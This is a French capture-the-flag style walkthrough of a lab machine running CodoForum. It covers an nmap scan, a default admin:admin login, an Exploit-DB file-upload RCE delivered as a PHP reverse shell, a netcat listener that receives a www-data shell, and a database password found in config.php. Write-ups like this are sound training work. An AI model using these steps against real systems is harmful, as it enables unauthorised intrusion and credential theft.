Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-23 06:11 EDT
Nmap scan report for 192.168.194.23
Host is up (0.034s latency).
Not shown: 65533 filtered tcp ports (no-response)
Bug in http-generator: no string output.
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 62:36:1a:5c:d3:e3:7b:e1:70:f8:a3:b3:1c:4c:24:38 (RSA)
| 256 ee:25:fc:23:66:05:c0:c1:ec:47:c6:bb:00:c7:4f:53 (ECDSA)
|_ 256 83:5c:51:ac:32:e5:3a:21:7c:f6:c2:cd:93:68:58:d8 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-title: All topics | CODOLOGIC
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
HTTP (80) : apache 2.4.41
Codologic
Nous allons à la page admin http://192.168.194.23/admin
Après une rapide recheche google nous ne trouvons pas de mot de passe par défault. Nous savons que l'utilisateur admin existe. Nous allons donc tester admin:admin... et cela fonctionne.
"Current version: v.5.1.105"
Une autre recherche google nous permet de trouver un exploit
https://www.exploit-db.com/exploits/50978
Accès initial
File Upload RCE
J'ai testé l'exploit mais aucun résultat pour ma part.
J'ai ensuite suivi le chemin donné par l'auteur de l'exploit :
Il s'agit d'un upload de fichier malveillant. Nous avons copié php-reverse-monkey en notant notre adresse IP et notre port d'écoute (nom du fichier : reverse.php) Uploader le fichier à partir de Global Setting. Nous l'avons exécuté avec http://192.168.194.23/sites/default/assets/img/attachments/reverse.php Un listener tourne au même moment.
Elévation des privilèges
Chercher password
Il est commun de chercher des mots de passe / username dans les fichier de configuration. Ainsi nous trouvons "'password' => 'FatPanda123'" dans le fichier /var/www/html/sites/default/config.php. Il était également trouvable grâce à linpeas.sh
Durant la phase d'énumération, nous avons trouvé :
2 utilisateurs : offsec (ls dans /home ou lecture d' /etc/passwd) et root
2 ports : mysql (ss -tulpn ou linpeas.sh) et ssh (nmap)
┌──(kali㉿kali)-[~]
└─$ nc -lnvp 444
listening on [any] 444 ...
connect to [192.168.45.195] from (UNKNOWN) [192.168.194.23] 37096
Linux codo 5.4.0-150-generic #167-Ubuntu SMP Mon May 15 17:35:05 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
10:35:28 up 29 min, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bash: cannot set terminal process group (1131): Inappropriate ioctl for device
bash: no job control in this shell
